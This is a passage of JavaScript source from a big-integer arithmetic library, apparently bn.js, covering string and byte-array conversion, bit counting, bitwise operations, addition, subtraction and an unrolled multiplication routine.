        "",
        "0",
        "00",
        "000",
        "0000",
        "00000",
        "000000",
        "0000000",
        "00000000",
        "000000000",
        "0000000000",
        "00000000000",
        "000000000000",
        "0000000000000",
        "00000000000000",
        "000000000000000",
        "0000000000000000",
        "00000000000000000",
        "000000000000000000",
        "0000000000000000000",
        "00000000000000000000",
        "000000000000000000000",
        "0000000000000000000000",
        "00000000000000000000000",
        "000000000000000000000000",
        "0000000000000000000000000"
    ];
    var groupSizes = [
        0,
        0,
        25,
        16,
        12,
        11,
        10,
        9,
        8,
        8,
        7,
        7,
        7,
        7,
        6,
        6,
        6,
        6,
        6,
        6,
        6,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5
    ];
    var groupBases = [
        0,
        0,
        33554432,
        43046721,
        16777216,
        48828125,
        60466176,
        40353607,
        16777216,
        43046721,
        10000000,
        19487171,
        35831808,
        62748517,
        7529536,
        11390625,
        16777216,
        24137569,
        34012224,
        47045881,
        64000000,
        4084101,
        5153632,
        6436343,
        7962624,
        9765625,
        11881376,
        14348907,
        17210368,
        20511149,
        24300000,
        28629151,
        33554432,
        39135393,
        45435424,
        52521875,
        60466176
    ];
    BN.prototype.toString = function toString(base, padding) {
        base = base || 10;
        padding = padding | 0 || 1;
        var out;
        if (base === 16 || base === "hex") {
            out = "";
            var off = 0;
            var carry = 0;
            for(var i = 0; i < this.length; i++){
                var w = this.words[i];
                var word = ((w << off | carry) & 0xffffff).toString(16);
                carry = w >>> 24 - off & 0xffffff;
                if (carry !== 0 || i !== this.length - 1) out = zeros[6 - word.length] + word + out;
                else out = word + out;
                off += 2;
                if (off >= 26) {
                    off -= 26;
                    i--;
                }
            }
            if (carry !== 0) out = carry.toString(16) + out;
            while(out.length % padding !== 0)out = "0" + out;
            if (this.negative !== 0) out = "-" + out;
            return out;
        }
        if (base === (base | 0) && base >= 2 && base <= 36) {
            // var groupSize = Math.floor(BN.wordSize * Math.LN2 / Math.log(base));
            var groupSize = groupSizes[base];
            // var groupBase = Math.pow(base, groupSize);
            var groupBase = groupBases[base];
            out = "";
            var c = this.clone();
            c.negative = 0;
            while(!c.isZero()){
                var r = c.modn(groupBase).toString(base);
                c = c.idivn(groupBase);
                if (!c.isZero()) out = zeros[groupSize - r.length] + r + out;
                else out = r + out;
            }
            if (this.isZero()) out = "0" + out;
            while(out.length % padding !== 0)out = "0" + out;
            if (this.negative !== 0) out = "-" + out;
            return out;
        }
        assert(false, "Base should be between 2 and 36");
    };
    BN.prototype.toNumber = function toNumber() {
        var ret = this.words[0];
        if (this.length === 2) ret += this.words[1] * 0x4000000;
        else if (this.length === 3 && this.words[2] === 0x01) // NOTE: at this stage it is known that the top bit is set
        ret += 0x10000000000000 + this.words[1] * 0x4000000;
        else if (this.length > 2) assert(false, "Number can only safely store up to 53 bits");
        return this.negative !== 0 ? -ret : ret;
    };
    BN.prototype.toJSON = function toJSON() {
        return this.toString(16);
    };
    BN.prototype.toBuffer = function toBuffer(endian, length) {
        assert(typeof Buffer !== "undefined");
        return this.toArrayLike(Buffer, endian, length);
    };
    BN.prototype.toArray = function toArray(endian, length) {
        return this.toArrayLike(Array, endian, length);
    };
    BN.prototype.toArrayLike = function toArrayLike(ArrayType, endian, length) {
        var byteLength = this.byteLength();
        var reqLength = length || Math.max(1, byteLength);
        assert(byteLength <= reqLength, "byte array longer than desired length");
        assert(reqLength > 0, "Requested array length <= 0");
        this.strip();
        var littleEndian = endian === "le";
        var res = new ArrayType(reqLength);
        var b, i;
        var q = this.clone();
        if (!littleEndian) {
            // Assume big-endian
            for(i = 0; i < reqLength - byteLength; i++)res[i] = 0;
            for(i = 0; !q.isZero(); i++){
                b = q.andln(0xff);
                q.iushrn(8);
                res[reqLength - i - 1] = b;
            }
        } else {
            for(i = 0; !q.isZero(); i++){
                b = q.andln(0xff);
                q.iushrn(8);
                res[i] = b;
            }
            for(; i < reqLength; i++)res[i] = 0;
        }
        return res;
    };
    if (Math.clz32) BN.prototype._countBits = function _countBits(w) {
        return 32 - Math.clz32(w);
    };
    else BN.prototype._countBits = function _countBits(w) {
        var t = w;
        var r = 0;
        if (t >= 0x1000) {
            r += 13;
            t >>>= 13;
        }
        if (t >= 0x40) {
            r += 7;
            t >>>= 7;
        }
        if (t >= 0x8) {
            r += 4;
            t >>>= 4;
        }
        if (t >= 0x02) {
            r += 2;
            t >>>= 2;
        }
        return r + t;
    };
    BN.prototype._zeroBits = function _zeroBits(w) {
        // Short-cut
        if (w === 0) return 26;
        var t = w;
        var r = 0;
        if ((t & 0x1fff) === 0) {
            r += 13;
            t >>>= 13;
        }
        if ((t & 0x7f) === 0) {
            r += 7;
            t >>>= 7;
        }
        if ((t & 0xf) === 0) {
            r += 4;
            t >>>= 4;
        }
        if ((t & 0x3) === 0) {
            r += 2;
            t >>>= 2;
        }
        if ((t & 0x1) === 0) r++;
        return r;
    };
    // Return number of used bits in a BN
    BN.prototype.bitLength = function bitLength() {
        var w = this.words[this.length - 1];
        var hi = this._countBits(w);
        return (this.length - 1) * 26 + hi;
    };
    function toBitArray(num) {
        var w = new Array(num.bitLength());
        for(var bit = 0; bit < w.length; bit++){
            var off = bit / 26 | 0;
            var wbit = bit % 26;
            w[bit] = (num.words[off] & 1 << wbit) >>> wbit;
        }
        return w;
    }
    // Number of trailing zero bits
    BN.prototype.zeroBits = function zeroBits() {
        if (this.isZero()) return 0;
        var r = 0;
        for(var i = 0; i < this.length; i++){
            var b = this._zeroBits(this.words[i]);
            r += b;
            if (b !== 26) break;
        }
        return r;
    };
    BN.prototype.byteLength = function byteLength() {
        return Math.ceil(this.bitLength() / 8);
    };
    BN.prototype.toTwos = function toTwos(width) {
        if (this.negative !== 0) return this.abs().inotn(width).iaddn(1);
        return this.clone();
    };
    BN.prototype.fromTwos = function fromTwos(width) {
        if (this.testn(width - 1)) return this.notn(width).iaddn(1).ineg();
        return this.clone();
    };
    BN.prototype.isNeg = function isNeg() {
        return this.negative !== 0;
    };
    // Return negative clone of `this`
    BN.prototype.neg = function neg() {
        return this.clone().ineg();
    };
    BN.prototype.ineg = function ineg() {
        if (!this.isZero()) this.negative ^= 1;
        return this;
    };
    // Or `num` with `this` in-place
    BN.prototype.iuor = function iuor(num) {
        while(this.length < num.length)this.words[this.length++] = 0;
        for(var i = 0; i < num.length; i++)this.words[i] = this.words[i] | num.words[i];
        return this.strip();
    };
    BN.prototype.ior = function ior(num) {
        assert((this.negative | num.negative) === 0);
        return this.iuor(num);
    };
    // Or `num` with `this`
    BN.prototype.or = function or(num) {
        if (this.length > num.length) return this.clone().ior(num);
        return num.clone().ior(this);
    };
    BN.prototype.uor = function uor(num) {
        if (this.length > num.length) return this.clone().iuor(num);
        return num.clone().iuor(this);
    };
    // And `num` with `this` in-place
    BN.prototype.iuand = function iuand(num) {
        // b = min-length(num, this)
        var b;
        if (this.length > num.length) b = num;
        else b = this;
        for(var i = 0; i < b.length; i++)this.words[i] = this.words[i] & num.words[i];
        this.length = b.length;
        return this.strip();
    };
    BN.prototype.iand = function iand(num) {
        assert((this.negative | num.negative) === 0);
        return this.iuand(num);
    };
    // And `num` with `this`
    BN.prototype.and = function and(num) {
        if (this.length > num.length) return this.clone().iand(num);
        return num.clone().iand(this);
    };
    BN.prototype.uand = function uand(num) {
        if (this.length > num.length) return this.clone().iuand(num);
        return num.clone().iuand(this);
    };
    // Xor `num` with `this` in-place
    BN.prototype.iuxor = function iuxor(num) {
        // a.length > b.length
        var a;
        var b;
        if (this.length > num.length) {
            a = this;
            b = num;
        } else {
            a = num;
            b = this;
        }
        for(var i = 0; i < b.length; i++)this.words[i] = a.words[i] ^ b.words[i];
        if (this !== a) for(; i < a.length; i++)this.words[i] = a.words[i];
        this.length = a.length;
        return this.strip();
    };
    BN.prototype.ixor = function ixor(num) {
        assert((this.negative | num.negative) === 0);
        return this.iuxor(num);
    };
    // Xor `num` with `this`
    BN.prototype.xor = function xor(num) {
        if (this.length > num.length) return this.clone().ixor(num);
        return num.clone().ixor(this);
    };
    BN.prototype.uxor = function uxor(num) {
        if (this.length > num.length) return this.clone().iuxor(num);
        return num.clone().iuxor(this);
    };
    // Not ``this`` with ``width`` bitwidth
    BN.prototype.inotn = function inotn(width) {
        assert(typeof width === "number" && width >= 0);
        var bytesNeeded = Math.ceil(width / 26) | 0;
        var bitsLeft = width % 26;
        // Extend the buffer with leading zeroes
        this._expand(bytesNeeded);
        if (bitsLeft > 0) bytesNeeded--;
        // Handle complete words
        for(var i = 0; i < bytesNeeded; i++)this.words[i] = ~this.words[i] & 0x3ffffff;
        // Handle the residue
        if (bitsLeft > 0) this.words[i] = ~this.words[i] & 0x3ffffff >> 26 - bitsLeft;
        // And remove leading zeroes
        return this.strip();
    };
    BN.prototype.notn = function notn(width) {
        return this.clone().inotn(width);
    };
    // Set `bit` of `this`
    BN.prototype.setn = function setn(bit, val) {
        assert(typeof bit === "number" && bit >= 0);
        var off = bit / 26 | 0;
        var wbit = bit % 26;
        this._expand(off + 1);
        if (val) this.words[off] = this.words[off] | 1 << wbit;
        else this.words[off] = this.words[off] & ~(1 << wbit);
        return this.strip();
    };
    // Add `num` to `this` in-place
    BN.prototype.iadd = function iadd(num) {
        var r;
        // negative + positive
        if (this.negative !== 0 && num.negative === 0) {
            this.negative = 0;
            r = this.isub(num);
            this.negative ^= 1;
            return this._normSign();
        // positive + negative
        } else if (this.negative === 0 && num.negative !== 0) {
            num.negative = 0;
            r = this.isub(num);
            num.negative = 1;
            return r._normSign();
        }
        // a.length > b.length
        var a, b;
        if (this.length > num.length) {
            a = this;
            b = num;
        } else {
            a = num;
            b = this;
        }
        var carry = 0;
        for(var i = 0; i < b.length; i++){
            r = (a.words[i] | 0) + (b.words[i] | 0) + carry;
            this.words[i] = r & 0x3ffffff;
            carry = r >>> 26;
        }
        for(; carry !== 0 && i < a.length; i++){
            r = (a.words[i] | 0) + carry;
            this.words[i] = r & 0x3ffffff;
            carry = r >>> 26;
        }
        this.length = a.length;
        if (carry !== 0) {
            this.words[this.length] = carry;
            this.length++;
        // Copy the rest of the words
        } else if (a !== this) for(; i < a.length; i++)this.words[i] = a.words[i];
        return this;
    };
    // Add `num` to `this`
    BN.prototype.add = function add(num) {
        var res;
        if (num.negative !== 0 && this.negative === 0) {
            num.negative = 0;
            res = this.sub(num);
            num.negative ^= 1;
            return res;
        } else if (num.negative === 0 && this.negative !== 0) {
            this.negative = 0;
            res = num.sub(this);
            this.negative = 1;
            return res;
        }
        if (this.length > num.length) return this.clone().iadd(num);
        return num.clone().iadd(this);
    };
    // Subtract `num` from `this` in-place
    BN.prototype.isub = function isub(num) {
        // this - (-num) = this + num
        if (num.negative !== 0) {
            num.negative = 0;
            var r = this.iadd(num);
            num.negative = 1;
            return r._normSign();
        // -this - num = -(this + num)
        } else if (this.negative !== 0) {
            this.negative = 0;
            this.iadd(num);
            this.negative = 1;
            return this._normSign();
        }
        // At this point both numbers are positive
        var cmp = this.cmp(num);
        // Optimization - zeroify
        if (cmp === 0) {
            this.negative = 0;
            this.length = 1;
            this.words[0] = 0;
            return this;
        }
        // a > b
        var a, b;
        if (cmp > 0) {
            a = this;
            b = num;
        } else {
            a = num;
            b = this;
        }
        var carry = 0;
        for(var i = 0; i < b.length; i++){
            r = (a.words[i] | 0) - (b.words[i] | 0) + carry;
            carry = r >> 26;
            this.words[i] = r & 0x3ffffff;
        }
        for(; carry !== 0 && i < a.length; i++){
            r = (a.words[i] | 0) + carry;
            carry = r >> 26;
            this.words[i] = r & 0x3ffffff;
        }
        // Copy rest of the words
        if (carry === 0 && i < a.length && a !== this) for(; i < a.length; i++)this.words[i] = a.words[i];
        this.length = Math.max(this.length, i);
        if (a !== this) this.negative = 1;
        return this.strip();
    };
    // Subtract `num` from `this`
    BN.prototype.sub = function sub(num) {
        return this.clone().isub(num);
    };
    function smallMulTo(self, num, out) {
        out.negative = num.negative ^ self.negative;
        var len = self.length + num.length | 0;
        out.length = len;
        len = len - 1 | 0;
        // Peel one iteration (compiler can't do it, because of code complexity)
        var a = self.words[0] | 0;
        var b = num.words[0] | 0;
        var r = a * b;
        var lo = r & 0x3ffffff;
        var carry = r / 0x4000000 | 0;
        out.words[0] = lo;
        for(var k = 1; k < len; k++){
            // Sum all words with the same `i + j = k` and accumulate `ncarry`,
            // note that ncarry could be >= 0x3ffffff
            var ncarry = carry >>> 26;
            var rword = carry & 0x3ffffff;
            var maxJ = Math.min(k, num.length - 1);
            for(var j = Math.max(0, k - self.length + 1); j <= maxJ; j++){
                var i = k - j | 0;
                a = self.words[i] | 0;
                b = num.words[j] | 0;
                r = a * b + rword;
                ncarry += r / 0x4000000 | 0;
                rword = r & 0x3ffffff;
            }
            out.words[k] = rword | 0;
            carry = ncarry | 0;
        }
        if (carry !== 0) out.words[k] = carry | 0;
        else out.length--;
        return out.strip();
    }
    // TODO(indutny): it may be reasonable to omit it for users who don't need
    // to work with 256-bit numbers, otherwise it gives 20% improvement for 256-bit
    // multiplication (like elliptic secp256k1).
    var comb10MulTo = function comb10MulTo(self, num, out) {
        var a = self.words;
        var b = num.words;
        var o = out.words;
        var c = 0;
        var lo;
        var mid;
        var hi;
        var a0 = a[0] | 0;
        var al0 = a0 & 0x1fff;
        var ah0 = a0 >>> 13;
        var a1 = a[1] | 0;
        var al1 = a1 & 0x1fff;
        var ah1 = a1 >>> 13;
        var a2 = a[2] | 0;
        var al2 = a2 & 0x1fff;
        var ah2 = a2 >>> 13;
        var a3 = a[3] | 0;
        var al3 = a3 & 0x1fff;
        var ah3 = a3 >>> 13;
        var a4 = a[4] | 0;
        var al4 = a4 & 0x1fff;
        var ah4 = a4 >>> 13;
        var a5 = a[5] | 0;
        var al5 = a5 & 0x1fff;
        var ah5 = a5 >>> 13;
        var a6 = a[6] | 0;
        var al6 = a6 & 0x1fff;
        var ah6 = a6 >>> 13;
        var a7 = a[7] | 0;
        var al7 = a7 & 0x1fff;
        var ah7 = a7 >>> 13;
        var a8 = a[8] | 0;
        var al8 = a8 & 0x1fff;
        var ah8 = a8 >>> 13;
        var a9 = a[9] | 0;
        var al9 = a9 & 0x1fff;
        var ah9 = a9 >>> 13;
        var b0 = b[0] | 0;
        var bl0 = b0 & 0x1fff;
        var bh0 = b0 >>> 13;
        var b1 = b[1] | 0;
        var bl1 = b1 & 0x1fff;
        var bh1 = b1 >>> 13;
        var b2 = b[2] | 0;
        var bl2 = b2 & 0x1fff;
        var bh2 = b2 >>> 13;
        var b3 = b[3] | 0;
        var bl3 = b3 & 0x1fff;
        var bh3 = b3 >>> 13;
        var b4 = b[4] | 0;
        var bl4 = b4 & 0x1fff;
        var bh4 = b4 >>> 13;
        var b5 = b[5] | 0;
        var bl5 = b5 & 0x1fff;
        var bh5 = b5 >>> 13;
        var b6 = b[6] | 0;
        var bl6 = b6 & 0x1fff;
        var bh6 = b6 >>> 13;
        var b7 = b[7] | 0;
        var bl7 = b7 & 0x1fff;
        var bh7 = b7 >>> 13;
        var b8 = b[8] | 0;
        var bl8 = b8 & 0x1fff;
        var bh8 = b8 >>> 13;
        var b9 = b[9] | 0;
        var bl9 = b9 & 0x1fff;
        var bh9 = b9 >>> 13;
        out.negative = self.negative ^ num.negative;
        out.length = 19;
        /* k = 0 */ lo = Math.imul(al0, bl0);
        mid = Math.imul(al0, bh0);
        mid = mid + Math.imul(ah0, bl0) | 0;
        hi = Math.imul(ah0, bh0);
        var w0 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w0 >>> 26) | 0;
        w0 &= 0x3ffffff;
        /* k = 1 */ lo = Math.imul(al1, bl0);
        mid = Math.imul(al1, bh0);
        mid = mid + Math.imul(ah1, bl0) | 0;
        hi = Math.imul(ah1, bh0);
        lo = lo + Math.imul(al0, bl1) | 0;
        mid = mid + Math.imul(al0, bh1) | 0;
        mid = mid + Math.imul(ah0, bl1) | 0;
        hi = hi + Math.imul(ah0, bh1) | 0;
        var w1 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w1 >>> 26) | 0;
        w1 &= 0x3ffffff;
        /* k = 2 */ lo = Math.imul(al2, bl0);
        mid = Math.imul(al2, bh0);
        mid = mid + Math.imul(ah2, bl0) | 0;
        hi = Math.imul(ah2, bh0);
        lo = lo + Math.imul(al1, bl1) | 0;
        mid = mid + Math.imul(al1, bh1) | 0;
        mid = mid + Math.imul(ah1, bl1) | 0;
        hi = hi + Math.imul(ah1, bh1) | 0;
        lo = lo + Math.imul(al0, bl2) | 0;
        mid = mid + Math.imul(al0, bh2) | 0;
        mid = mid + Math.imul(ah0, bl2) | 0;
        hi = hi + Math.imul(ah0, bh2) | 0;
        var w2 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w2 >>> 26) | 0;
        w2 &= 0x3ffffff;
        /* k = 3 */ lo = Math.imul(al3, bl0);
        mid = Math.imul(al3, bh0);
        mid = mid + Math.imul(ah3, bl0) | 0;
        hi = Math.imul(ah3, bh0);
        lo = lo + Math.imul(al2, bl1) | 0;
        mid = mid + Math.imul(al2, bh1) | 0;
        mid = mid + Math.imul(ah2, bl1) | 0;
        hi = hi + Math.imul(ah2, bh1) | 0;
        lo = lo + Math.imul(al1, bl2) | 0;
        mid = mid + Math.imul(al1, bh2) | 0;
        mid = mid + Math.imul(ah1, bl2) | 0;
        hi = hi + Math.imul(ah1, bh2) | 0;
        lo = lo + Math.imul(al0, bl3) | 0;
        mid = mid + Math.imul(al0, bh3) | 0;
        mid = mid + Math.imul(ah0, bl3) | 0;
        hi = hi + Math.imul(ah0, bh3) | 0;
        var w3 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w3 >>> 26) | 0;
        w3 &= 0x3ffffff;
        /* k = 4 */ lo = Math.imul(al4, bl0);
        mid = Math.imul(al4, bh0);
        mid = mid + Math.imul(ah4, bl0) | 0;
        hi = Math.imul(ah4, bh0);
        lo = lo + Math.imul(al3, bl1) | 0;
        mid = mid + Math.imul(al3, bh1) | 0;
        mid = mid + Math.imul(ah3, bl1) | 0;
        hi = hi + Math.imul(ah3, bh1) | 0;
        lo = lo + Math.imul(al2, bl2) | 0;
        mid = mid + Math.imul(al2, bh2) | 0;
        mid = mid + Math.imul(ah2, bl2) | 0;
        hi = hi + Math.imul(ah2, bh2) | 0;
        lo = lo + Math.imul(al1, bl3) | 0;
        mid = mid + Math.imul(al1, bh3) | 0;
        mid = mid + Math.imul(ah1, bl3) | 0;
        hi = hi + Math.imul(ah1, bh3) | 0;
        lo = lo + Math.imul(al0, bl4) | 0;
        mid = mid + Math.imul(al0, bh4) | 0;
        mid = mid + Math.imul(ah0, bl4) | 0;
        hi = hi + Math.imul(ah0, bh4) | 0;
        var w4 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w4 >>> 26) | 0;
        w4 &= 0x3ffffff;
        /* k = 5 */ lo = Math.imul(al5, bl0);
        mid = Math.imul(al5, bh0);
        mid = mid + Math.imul(ah5, bl0) | 0;
        hi = Math.imul(ah5, bh0);
        lo = lo + Math.imul(al4, bl1) | 0;
        mid = mid + Math.imul(al4, bh1) | 0;
        mid = mid + Math.imul(ah4, bl1) | 0;
        hi = hi + Math.imul(ah4, bh1) | 0;
        lo = lo + Math.imul(al3, bl2) | 0;
        mid = mid + Math.imul(al3, bh2) | 0;
        mid = mid + Math.imul(ah3, bl2) | 0;
        hi = hi + Math.imul(ah3, bh2) | 0;
        lo = lo + Math.imul(al2, bl3) | 0;
        mid = mid + Math.imul(al2, bh3) | 0;
        mid = mid + Math.imul(ah2, bl3) | 0;
        hi = hi + Math.imul(ah2, bh3) | 0;
        lo = lo + Math.imul(al1, bl4) | 0;
        mid = mid + Math.imul(al1, bh4) | 0;
        mid = mid + Math.imul(ah1, bl4) | 0;
        hi = hi + Math.imul(ah1, bh4) | 0;
        lo = lo + Math.imul(al0, bl5) | 0;
        mid = mid + Math.imul(al0, bh5) | 0;
        mid = mid + Math.imul(ah0, bl5) | 0;
        hi = hi + Math.imul(ah0, bh5) | 0;
        var w5 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w5 >>> 26) | 0;
        w5 &= 0x3ffffff;
        /* k = 6 */ lo = Math.imul(al6, bl0);
        mid = Math.imul(al6, bh0);
        mid = mid + Math.imul(ah6, bl0) | 0;
        hi = Math.imul(ah6, bh0);
        lo = lo + Math.imul(al5, bl1) | 0;
        mid = mid + Math.imul(al5, bh1) | 0;
        mid = mid + Math.imul(ah5, bl1) | 0;
        hi = hi + Math.imul(ah5, bh1) | 0;
        lo = lo + Math.imul(al4, bl2) | 0;
        mid = mid + Math.imul(al4, bh2) | 0;
        mid = mid + Math.imul(ah4, bl2) | 0;
        hi = hi + Math.imul(ah4, bh2) | 0;
        lo = lo + Math.imul(al3, bl3) | 0;
        mid = mid + Math.imul(al3, bh3) | 0;
        mid = mid + Math.imul(ah3, bl3) | 0;
        hi = hi + Math.imul(ah3, bh3) | 0;
        lo = lo + Math.imul(al2, bl4) | 0;
        mid = mid + Math.imul(al2, bh4) | 0;
        mid = mid + Math.imul(ah2, bl4) | 0;
        hi = hi + Math.imul(ah2, bh4) | 0;
        lo = lo + Math.imul(al1, bl5) | 0;
        mid = mid + Math.imul(al1, bh5) | 0;
        mid = mid + Math.imul(ah1, bl5) | 0;
        hi = hi + Math.imul(ah1, bh5) | 0;
        lo = lo + Math.imul(al0, bl6) | 0;
        mid = mid + Math.imul(al0, bh6) | 0;
        mid = mid + Math.imul(ah0, bl6) | 0;
        hi = hi + Math.imul(ah0, bh6) | 0;
        var w6 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w6 >>> 26) | 0;
        w6 &= 0x3ffffff;
        /* k = 7 */ lo = Math.imul(al7, bl0);
        mid = Math.imul(al7, bh0);
        mid = mid + Math.imul(ah7, bl0) | 0;
        hi = Math.imul(ah7, bh0);
        lo = lo + Math.imul(al6, bl1) | 0;
        mid = mid + Math.imul(al6, bh1) | 0;
        mid = mid + Math.imul(ah6, bl1) | 0;
        hi = hi + Math.imul(ah6, bh1) | 0;
        lo = lo + Math.imul(al5, bl2) | 0;
        mid = mid + Math.imul(al5, bh2) | 0;
        mid = mid + Math.imul(ah5, bl2) | 0;
        hi = hi + Math.imul(ah5, bh2) | 0;
        lo = lo + Math.imul(al4, bl3) | 0;
        mid = mid + Math.imul(al4, bh3) | 0;
        mid = mid + Math.imul(ah4, bl3) | 0;
        hi = hi + Math.imul(ah4, bh3) | 0;
        lo = lo + Math.imul(al3, bl4) | 0;
        mid = mid + Math.imul(al3, bh4) | 0;
        mid = mid + Math.imul(ah3, bl4) | 0;
        hi = hi + Math.imul(ah3, bh4) | 0;
        lo = lo + Math.imul(al2, bl5) | 0;
        mid = mid + Math.imul(al2, bh5) | 0;
        mid = mid + Math.imul(ah2, bl5) | 0;
        hi = hi + Math.imul(ah2, bh5) | 0;
        lo = lo + Math.imul(al1, bl6) | 0;
        mid = mid + Math.imul(al1, bh6) | 0;
        mid = mid + Math.imul(ah1, bl6) | 0;
        hi = hi + Math.imul(ah1, bh6) | 0;
        lo = lo + Math.imul(al0, bl7) | 0;
        mid = mid + Math.imul(al0, bh7) | 0;
        mid = mid + Math.imul(ah0, bl7) | 0;
        hi = hi + Math.imul(ah0, bh7) | 0;
        var w7 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w7 >>> 26) | 0;
        w7 &= 0x3ffffff;
        /* k = 8 */ lo = Math.imul(al8, bl0);
        mid = Math.imul(al8, bh0);
        mid = mid + Math.imul(ah8, bl0) | 0;
        hi = Math.imul(ah8, bh0);
        lo = lo + Math.imul(al7, bl1) | 0;
        mid = mid + Math.imul(al7, bh1) | 0;
        mid = mid + Math.imul(ah7, bl1) | 0;
        hi = hi + Math.imul(ah7, bh1) | 0;
        lo = lo + Math.imul(al6, bl2) | 0;
        mid = mid + Math.imul(al6, bh2) | 0;
        mid = mid + Math.imul(ah6, bl2) | 0;
        hi = hi + Math.imul(ah6, bh2) | 0;
        lo = lo + Math.imul(al5, bl3) | 0;
        mid = mid + Math.imul(al5, bh3) | 0;
        mid = mid + Math.imul(ah5, bl3) | 0;
        hi = hi + Math.imul(ah5, bh3) | 0;
        lo = lo + Math.imul(al4, bl4) | 0;
        mid = mid + Math.imul(al4, bh4) | 0;
        mid = mid + Math.imul(ah4, bl4) | 0;
        hi = hi + Math.imul(ah4, bh4) | 0;
        lo = lo + Math.imul(al3, bl5) | 0;
        mid = mid + Math.imul(al3, bh5) | 0;
        mid = mid + Math.imul(ah3, bl5) | 0;
        hi = hi + Math.imul(ah3, bh5) | 0;
        lo = lo + Math.imul(al2, bl6) | 0;
        mid = mid + Math.imul(al2, bh6) | 0;
        mid = mid + Math.imul(ah2, bl6) | 0;
        hi = hi + Math.imul(ah2, bh6) | 0;
        lo = lo + Math.imul(al1, bl7) | 0;
        mid = mid + Math.imul(al1, bh7) | 0;
        mid = mid + Math.imul(ah1, bl7) | 0;
        hi = hi + Math.imul(ah1, bh7) | 0;
        lo = lo + Math.imul(al0, bl8) | 0;
        mid = mid + Math.imul(al0, bh8) | 0;
        mid = mid + Math.imul(ah0, bl8) | 0;
        hi = hi + Math.imul(ah0, bh8) | 0;
        var w8 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w8 >>> 26) | 0;
        w8 &= 0x3ffffff;
        /* k = 9 */ lo = Math.imul(al9, bl0);
        mid = Math.imul(al9, bh0);
        mid = mid + Math.imul(ah9, bl0) | 0;
        hi = Math.imul(ah9, bh0);
        lo = lo + Math.imul(al8, bl1) | 0;
        mid = mid + Math.imul(al8, bh1) | 0;
        mid = mid + Math.imul(ah8, bl1) | 0;
        hi = hi + Math.imul(ah8, bh1) | 0;
        lo = lo + Math.imul(al7, bl2) | 0;
        mid = mid + Math.imul(al7, bh2) | 0;
        mid = mid + Math.imul(ah7, bl2) | 0;
        hi = hi + Math.imul(ah7, bh2) | 0;
        lo = lo + Math.imul(al6, bl3) | 0;
        mid = mid + Math.imul(al6, bh3) | 0;
        mid = mid + Math.imul(ah6, bl3) | 0;
        hi = hi + Math.imul(ah6, bh3) | 0;
        lo = lo + Math.imul(al5, bl4) | 0;
        mid = mid + Math.imul(al5, bh4) | 0;
        mid = mid + Math.imul(ah5, bl4) | 0;
        hi = hi + Math.imul(ah5, bh4) | 0;
        lo = lo + Math.imul(al4, bl5) | 0;
        mid = mid + Math.imul(al4, bh5) | 0;
        mid = mid + Math.imul(ah4, bl5) | 0;
        hi = hi + Math.imul(ah4, bh5) | 0;
        lo = lo + Math.imul(al3, bl6) | 0;
        mid = mid + Math.imul(al3, bh6) | 0;
        mid = mid + Math.imul(ah3, bl6) | 0;
        hi = hi + Math.imul(ah3, bh6) | 0;
        lo = lo + Math.imul(al2, bl7) | 0;
        mid = mid + Math.imul(al2, bh7) | 0;
        mid = mid + Math.imul(ah2, bl7) | 0;
        hi = hi + Math.imul(ah2, bh7) | 0;
        lo = lo + Math.imul(al1, bl8) | 0;
        mid = mid + Math.imul(al1, bh8) | 0;
        mid = mid + Math.imul(ah1, bl8) | 0;
        hi = hi + Math.imul(ah1, bh8) | 0;
        lo = lo + Math.imul(al0, bl9) | 0;
        mid = mid + Math.imul(al0, bh9) | 0;
        mid = mid + Math.imul(ah0, bl9) | 0;
        hi = hi + Math.imul(ah0, bh9) | 0;
        var w9 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w9 >>> 26) | 0;
        w9 &= 0x3ffffff;
        /* k = 10 */ lo = Math.imul(al9, bl1);
        mid = Math.imul(al9, bh1);
        mid = mid + Math.imul(ah9, bl1) | 0;
        hi = Math.imul(ah9, bh1);
        lo = lo + Math.imul(al8, bl2) | 0;
        mid = mid + Math.imul(al8, bh2) | 0;
        mid = mid + Math.imul(ah8, bl2) | 0;
        hi = hi + Math.imul(ah8, bh2) | 0;
        lo = lo + Math.imul(al7, bl3) | 0;
        mid = mid + Math.imul(al7, bh3) | 0;
        mid = mid + Math.imul(ah7, bl3) | 0;
        hi = hi + Math.imul(ah7, bh3) | 0;
        lo = lo + Math.imul(al6, bl4) | 0;
        mid = mid + Math.imul(al6, bh4) | 0;
        mid = mid + Math.imul(ah6, bl4) | 0;
        hi = hi + Math.imul(ah6, bh4) | 0;
        lo = lo + Math.imul(al5, bl5) | 0;
        mid = mid + Math.imul(al5, bh5) | 0;
        mid = mid + Math.imul(ah5, bl5) | 0;
        hi = hi + Math.imul(ah5, bh5) | 0;
        lo = lo + Math.imul(al4, bl6) | 0;
        mid = mid + Math.imul(al4, bh6) | 0;
        mid = mid + Math.imul(ah4, bl6) | 0;
        hi = hi + Math.imul(ah4, bh6) | 0;
        lo = lo + Math.imul(al3, bl7) | 0;
        mid = mid + Math.imul(al3, bh7) | 0;
        mid = mid + Math.imul(ah3, bl7) | 0;
        hi = hi + Math.imul(ah3, bh7) | 0;
        lo = lo + Math.imul(al2, bl8) | 0;
        mid = mid + Math.imul(al2, bh8) | 0;
        mid = mid + Math.imul(ah2, bl8) | 0;
        hi = hi + Math.imul(ah2, bh8) | 0;
        lo = lo + Math.imul(al1, bl9) | 0;
        mid = mid + Math.imul(al1, bh9) | 0;
        mid = mid + Math.imul(ah1, bl9) | 0;
        hi = hi + Math.imul(ah1, bh9) | 0;
